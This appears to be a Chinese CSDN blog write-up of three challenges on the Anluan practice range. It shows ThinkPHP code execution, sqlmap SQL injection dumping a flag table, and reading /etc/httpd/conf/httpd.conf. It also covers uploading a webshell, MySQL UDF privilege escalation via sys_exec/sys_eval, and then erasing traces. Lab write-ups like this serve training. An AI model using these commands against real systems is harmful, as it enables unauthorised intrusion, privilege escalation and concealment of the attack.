• 【安鸾靶场】实战渗透



    前言

    最近看到安鸾的靶场有些比较有意思就打了一下午,有一定难度。

    一、××租房网 (150分)

    http://106.15.50.112:8031/
    在这里插入图片描述
    刚打开burp就报了thinkphp的代码执行
    在这里插入图片描述

    直接getshell
    在这里插入图片描述
    flag:
    在这里插入图片描述

    二、企业网站 (300分)

    http://106.15.50.112:8035/
    打开就看到闪灵cms
    在这里插入图片描述
    开启sqlmapapi:在这里插入图片描述
    去用户界面测试:
    在这里插入图片描述
    这里注册一个验证码直接空就行:
    这里有个注入点:

    GET /?type=form&S_id=987181647 HTTP/1.1
    Host: 106.15.50.112:8035
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8

    在这里插入图片描述
    没跑出来:
    在这里插入图片描述
    寻找其他注入点:
    在这里插入图片描述
    那个api跑的慢直接上-r
    在这里插入图片描述

    在这里插入图片描述
    这里有个flag
    在这里插入图片描述
    sqlmap -r .\test.txt -D scms -T SL_flag -C “flag,id” -dump
    在这里插入图片描述

    三、SQL注入进阶 (550分)

    题目URL:http://106.15.50.112:8023/
    提示:flag在服务器根目录

    感觉像是sql注入后台上传
    在这里插入图片描述
    感觉像是伪静态:
    在这里插入图片描述
    在这里插入图片描述
    尝试注入:加*
    在这里插入图片描述

    在这里插入图片描述
    加-dbs参数爆库:
    在这里插入图片描述
    加–tables爆表:

    在这里插入图片描述

    在这里插入图片描述

    在这里插入图片描述

    在这里插入图片描述
    找一下后台:
    在这里插入图片描述
    在这里插入图片描述
    这里有upload和images:都可以直接访问
    在这里插入图片描述
    寻找上传点:
    在这里插入图片描述

    制作图片马上传:
    在这里插入图片描述
    尝试修改扩展名:(失败)
    在这里插入图片描述
    限制了后缀
    寻找其他点:
    在这里插入图片描述
    这里又来sql注入加上刚找的就3个注入点了
    使用sqlmap获取一下shell
    在这里插入图片描述
    直接暴力跑路径:
    在这里插入图片描述
    失败(应该是不是默认的路径)
    读取一下apache的配置找找路径:可能存在的路径
    /etc/httpd/httpd.conf - 这是一种常见的位置,特别是在使用Red Hat或CentOS等发行版的系统中。
    /etc/apache2/httpd.conf - 在使用Debian或Ubuntu等系统时,配置文件可能会位于此位置。
    /usr/local/apache2/conf/httpd.conf - 如果安装apache通常会在/usr/local目录下找到它。
    /etc/httpd/conf/httpd.conf - 在某些系统中也可以在此位置找到配置文件。

    这里是这个路径直接读取:

    sqlmap -r .\test.txt  --file-read="/etc/httpd/conf/httpd.conf"
    
    • 1

    在这里插入图片描述
    在这里插入图片描述
    直接–os-shell(目录权限不够)
    在这里插入图片描述
    用upload试试:(权限不够)在这里插入图片描述
    试试其他的目录:

    在这里插入图片描述
    最后images有权限:
    在这里插入图片描述

    cat看不到,可能是权限问题:
    在这里插入图片描述
    在这里插入图片描述
    可以通过sqlmap上传自己的shell:
    sqlmap 会上传自己的马:
    在这里插入图片描述

    在这里插入图片描述
    选择我们的马上传:
    在这里插入图片描述
    蚁剑上线:
    在这里插入图片描述
    这里查看flag发现权限不够:
    在这里插入图片描述
    这是mysql权限:
    尝试suid失败,查看内核版本为5.15.0比较高gcc也没有,mysql的用户可以使用udf提权使用mysql的权限:
    这里的密码为空:
    在这里插入图片描述

    查看可导出文件位置

    show variables like '%secure%';
    这个mysql>5.1版本
    
    • 1
    • 2

    这的secure_file_priv为空可以提权
    在这里插入图片描述

    show variables like 'plugin%'
    
    • 1

    在这里插入图片描述
    在kali中生成so文件上传到plugin目录
    在这里插入图片描述

    在这里插入图片描述

    添加sys_exec和sys_eval函数

    create function sys_exec returns string soname 'mysqludf3.so'
    create function sys_eval returns string soname 'mysqludf3.so'
    
    • 1
    • 2

    在这里插入图片描述

    在这里插入图片描述

    清除痕迹:
    drop function sys_eval;
    drop function sys_exec;
    在这里插入图片描述
    在这里插入图片描述
    删除shell:
    在这里插入图片描述
    可以自己试试。

  • 相关阅读:
    Linux操作系统——Linux 内核源码介绍&内核升级
    操作系统初始化
    【测试】使用卷积神经网络(CNN)中的 卷积核 对 图像进行特征提取
    TT time tunnel时空隧道命令使用场景
    UNet详细解读(二)pytorch从头开始搭建UNet
    目标检测中的BBox 回归损失函数-L2,smooth L1,IoU,GIoU,DIoU,CIoU,Focal-EIoU,Alpha-IoU,SIoU
    【自学开发之旅】Flask-restful-Jinjia页面编写template-回顾(五)
    软件第三方测评机构简析:良好的测试环境对软件产品起到的作用
    八叉树的范围和射线检测
    [前端基础] JavaScript 进阶篇
  • 原文地址:https://blog.csdn.net/qq_39583774/article/details/133582318